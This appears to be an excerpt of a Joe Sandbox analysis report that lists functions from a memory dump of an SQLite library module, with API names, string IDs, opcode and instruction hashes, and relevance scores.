                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2444656285-0
                                                                                                                                            • Opcode ID: c30c6085cec16f445bc319ee7301202f4a7aa7cb8187d7f2ddb921c8b4b05c2e
                                                                                                                                            • Instruction ID: 7143cd1c6daae9501e903754e089939c502a95add7c740cb93a1c2c7af09ad12
                                                                                                                                            • Opcode Fuzzy Hash: c30c6085cec16f445bc319ee7301202f4a7aa7cb8187d7f2ddb921c8b4b05c2e
                                                                                                                                            • Instruction Fuzzy Hash: 09E1607594835ACFEB20CF58C890799BBF1BF46304F65C49AE8985B344D734D9868F42
                                                                                                                                            Function 61E1D3BC Relevance: 13.8, APIs: 3, Strings: 6, Instructions: 294stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: strncmp$sqlite3_realloc
                                                                                                                                            • String ID: "$[$f$n$t${
                                                                                                                                            • API String ID: 376036412-1714737523
                                                                                                                                            • Opcode ID: 0a090424efaf681855bf54a9f65f68632b10137e9abe9e860fe499f0a4d45a09
                                                                                                                                            • Instruction ID: 64de3516b4d30995faa39bb53a21e125637e37efe03b30567cf8edfdb90223b9
                                                                                                                                            • Opcode Fuzzy Hash: 0a090424efaf681855bf54a9f65f68632b10137e9abe9e860fe499f0a4d45a09
                                                                                                                                            • Instruction Fuzzy Hash: A4B1B678A4C2898FD721CF68C48A7D9BBF27B4931CF24C559D4948B39AC739D846CB11
                                                                                                                                            Function 61E85010 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1503958624-2766056989
                                                                                                                                            • Opcode ID: aafc3fdb3a8ed305672a2b5ae5c497fbf1d62d15941817515036867c45c2ed7b
                                                                                                                                            • Instruction ID: a08da7ce96221e979bcff68011cc15f3a87dea45d4d45cb97f5cddee0d0395e0
                                                                                                                                            • Opcode Fuzzy Hash: aafc3fdb3a8ed305672a2b5ae5c497fbf1d62d15941817515036867c45c2ed7b
                                                                                                                                            • Instruction Fuzzy Hash: 794113B5915B028FD740DF68C584A1ABBF0BF89354F69C91DE89D97350EB34E8848B82
                                                                                                                                            Function 61E2400F Relevance: 10.6, APIs: 7, Instructions: 93COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2264764126-0
                                                                                                                                            • Opcode ID: f4a24cb1987a28c645576bbc95223493ff28be2bb4834aafcad62c9a7c2cd125
                                                                                                                                            • Instruction ID: 215ca0319befc17eccccbd96179849b19b8a40b42a549c7d043b2059b9d0ea3f
                                                                                                                                            • Opcode Fuzzy Hash: f4a24cb1987a28c645576bbc95223493ff28be2bb4834aafcad62c9a7c2cd125
                                                                                                                                            • Instruction Fuzzy Hash: B7316075A086558BCB04DFA8C59099DBBF1EB8D314F25C42FE8989B300D679EC81CB52
                                                                                                                                            Function 61E28F83 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E28068: sqlite3_log.SQLITE3(?,?,?,?,?,61E2811B), ref: 61E280A3
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E28FB2
                                                                                                                                            • sqlite3_value_text16le.SQLITE3 ref: 61E28FC6
                                                                                                                                            • sqlite3_value_text16le.SQLITE3 ref: 61E28FF4
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E29008
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID: library routine called out of sequence$out of memory
                                                                                                                                            • API String ID: 3568942437-3029887290
                                                                                                                                            • Opcode ID: b24406e808208f8243e280420499638d1bcf540988ee4c103019a5cf0e6243d2
                                                                                                                                            • Instruction ID: e08d8797e383a0ce4221f86d9204bfba6d5c841cf68dc502112f567ed3446540
                                                                                                                                            • Opcode Fuzzy Hash: b24406e808208f8243e280420499638d1bcf540988ee4c103019a5cf0e6243d2
                                                                                                                                            • Instruction Fuzzy Hash: D1015271B043554BD710AFB8C4C0A25BBE4AF44358F25887DDD58CB301EB75CC408791
                                                                                                                                            Function 61E38879 Relevance: 9.4, APIs: 6, Instructions: 361stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2202632817-0
                                                                                                                                            • Opcode ID: 9f0a3cc0d928783b32e3fcbde51aa750811efdae56e44b17b01cde803bf6f4f5
                                                                                                                                            • Instruction ID: ee1b78a7377f4fe8f1e01a49623c1532a51755f147ad66caafb6251e233fa4c5
                                                                                                                                            • Opcode Fuzzy Hash: 9f0a3cc0d928783b32e3fcbde51aa750811efdae56e44b17b01cde803bf6f4f5
                                                                                                                                            • Instruction Fuzzy Hash: 18F1D374A0525A9FDB45CFA9C480B9DBBF1BF88308F248629E855EB344D734E846DF41
                                                                                                                                            Function 61E851B0 Relevance: 9.2, APIs: 6, Instructions: 220COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d95b19f9bfaad7d5bafe0dd8db069f688a35bf0e00207796f802d5329404be6e
                                                                                                                                            • Instruction ID: a85a9ac708498ac016337004e546997ce6af2692755ce7e458423bd8b1ff11a0
                                                                                                                                            • Opcode Fuzzy Hash: d95b19f9bfaad7d5bafe0dd8db069f688a35bf0e00207796f802d5329404be6e
                                                                                                                                            • Instruction Fuzzy Hash: 4281AC74A05611CFDB40DFA8C58164DBBF5BF89314F29C82AE85ACB314DB35E845CB82
                                                                                                                                            Function 61E16239 Relevance: 9.2, APIs: 6, Instructions: 219COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2585109301-0
                                                                                                                                            • Opcode ID: 8e005c596aea71cc4431ea047a0b999a726a92f9135dfdabd53b41f31bd3eaf8
                                                                                                                                            • Instruction ID: 9b0d2d1e1bad54a27c8e0b1ba0de23e2814693c2db87a2022e6c923a23cfce31
                                                                                                                                            • Opcode Fuzzy Hash: 8e005c596aea71cc4431ea047a0b999a726a92f9135dfdabd53b41f31bd3eaf8
                                                                                                                                            • Instruction Fuzzy Hash: 2AA114B5A09646CFDB00CF68C481B9AB7F1BF89314F298469EC559B309D774E852CFA0
                                                                                                                                            Function 61E31710 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 335COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E3138C: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E3147B), ref: 61E313BB
                                                                                                                                              • Part of subcall function 61E08FD1: memcmp.MSVCRT ref: 61E0902B
                                                                                                                                              • Part of subcall function 61E08FD1: memcmp.MSVCRT ref: 61E0908F
                                                                                                                                            • sqlite3_malloc64.SQLITE3 ref: 61E3192B
                                                                                                                                              • Part of subcall function 61E1A1B1: sqlite3_initialize.SQLITE3 ref: 61E1A1BC
                                                                                                                                            • memcmp.MSVCRT ref: 61E319EB
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E31AC9
                                                                                                                                            • sqlite3_log.SQLITE3 ref: 61E31B7A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmp$sqlite3_freesqlite3_initializesqlite3_logsqlite3_malloc64sqlite3_realloc64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 885863977-3916222277
                                                                                                                                            • Opcode ID: fcf0b42e516d1038f9453d4a89281181510524cc0d1a149a9850cde32b12388b
                                                                                                                                            • Instruction ID: 6d76b8d2d4a91be7234bdb49dd2ad4bfbb3e1b8360f07a5f00184a60dbaa54b2
                                                                                                                                            • Opcode Fuzzy Hash: fcf0b42e516d1038f9453d4a89281181510524cc0d1a149a9850cde32b12388b
                                                                                                                                            • Instruction Fuzzy Hash: FAE11070A04269CBDB14CFA9C98079DBBF1AF88309F24856ED859EB355E774D886CF40
                                                                                                                                            Function 61E23005 Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E23027
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E23035
                                                                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 61E23042
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E23070
                                                                                                                                            • sqlite3_result_error.SQLITE3 ref: 61E2309A
                                                                                                                                            • sqlite3_result_int.SQLITE3 ref: 61E230D2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4226599549-0
                                                                                                                                            • Opcode ID: 40f764ae822fc8341c87c852661b22bb65f00cd1d7b485c3a7d4c61599aafaba
                                                                                                                                            • Instruction ID: fa5c43b11a04baf67321788ad80b6ca56ee6949c52e615cb3c0f10121fd4aae2
                                                                                                                                            • Opcode Fuzzy Hash: 40f764ae822fc8341c87c852661b22bb65f00cd1d7b485c3a7d4c61599aafaba
                                                                                                                                            • Instruction Fuzzy Hash: 0621E8709047459BCB00DFA9D994A5DBBF1BF88725F20C92DE9A897390D734E841CF61
                                                                                                                                            Function 61E0BAA2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_strglob
                                                                                                                                            • String ID: $
                                                                                                                                            • API String ID: 476814121-227171996
                                                                                                                                            • Opcode ID: 7737a646b46aef62269d9938615feea80cfc0989ea3044ffbc9fcddb27c35cfe
                                                                                                                                            • Instruction ID: 7a8708075eacd6c34abe30baa4429fa3b5a05c5b5ce98b57a6a4003a3b8177b9
                                                                                                                                            • Opcode Fuzzy Hash: 7737a646b46aef62269d9938615feea80cfc0989ea3044ffbc9fcddb27c35cfe
                                                                                                                                            • Instruction Fuzzy Hash: 33213838D087D24AD7218BBAC58035BBEE4BF4671AF24C06DC4964B685E730D4A1CB03
                                                                                                                                            Function 61E16A3D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,61E16ABE), ref: 61E16A6D
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,61E16ABE), ref: 61E16A88
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_enter
                                                                                                                                            • String ID: @9a$@9a$@9a
                                                                                                                                            • API String ID: 3053899952-1227196597
                                                                                                                                            • Opcode ID: 86dfee60da7acafb760276c9778a9bb7f2a92392c005f6199ad652a5efd98fee
                                                                                                                                            • Instruction ID: 51464a5f178f23b80476e5d8c0e72251a39cc923bcff4401defe3f9300988d6b
                                                                                                                                            • Opcode Fuzzy Hash: 86dfee60da7acafb760276c9778a9bb7f2a92392c005f6199ad652a5efd98fee
                                                                                                                                            • Instruction Fuzzy Hash: DAF0F9313081518BEB009BEED586711FBA5BB89318F68C97AE448CF358D2B1D8408791
                                                                                                                                            Function 61E3B91F Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 423COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E13C8E: sqlite3_mutex_try.SQLITE3(?,00000000,?,61E13CF0), ref: 61E13C2E
                                                                                                                                            • memcmp.MSVCRT ref: 61E3BA52
                                                                                                                                            • memcmp.MSVCRT ref: 61E3BA8E
                                                                                                                                            • memcmp.MSVCRT ref: 61E3BB0A
                                                                                                                                            • memcmp.MSVCRT ref: 61E3BD14
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmp$sqlite3_mutex_try
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 2794522359-4108050209
                                                                                                                                            • Opcode ID: 3ac686300865fe194f72bdd91be57a9ce56ae1785c8d5cbabc28614575de9296
                                                                                                                                            • Instruction ID: 16ba7343736bb527158698b474bbcd3afd71df4d9d6603271a2c87e4fbdf42af
                                                                                                                                            • Opcode Fuzzy Hash: 3ac686300865fe194f72bdd91be57a9ce56ae1785c8d5cbabc28614575de9296
                                                                                                                                            • Instruction Fuzzy Hash: A502BC70E04A698FEB05CFA9C08479DBBF1AFC8308F24C569E8469B395D734E885CB51
                                                                                                                                            Function 61E1840D Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
